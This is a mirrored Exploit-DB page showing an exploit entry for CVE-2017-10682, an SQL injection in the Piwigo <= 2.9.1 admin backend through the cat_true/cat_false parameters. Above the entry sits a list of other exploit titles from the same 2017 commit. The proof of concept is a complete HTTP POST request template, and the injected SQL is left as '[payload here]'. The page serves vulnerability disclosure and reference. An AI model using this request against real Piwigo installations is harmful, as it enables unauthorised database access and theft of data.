bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/43337.txt
Offensive Security ed1c4edf3e DB: 2017-12-15 
13 changes to exploits/shellcodes

Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)
Microsoft Office - DDE Payload Delivery (Metasploit)
Dup Scout Enterprise - Login Buffer Overflow (Metasploit)
pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit)
Palo Alto Networks Firewalls - Remote root Code Execution
Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection
Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection
Readymade Video Sharing Script 3.2 - HTML Injection
Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection
FS Lynda Clone 1.0 - SQL Injection
Bus Booking Script 1.0 - 'txtname' SQL Injection
Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection
Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)
2017-12-15 05:02:23 +00:00

40 lines
No EOL
1.3 KiB
Text
Raw Blame History

# # # # #
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: akityo@foxmail.com
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#
# # # # #
Reference in a new issue View git blame Copy permalink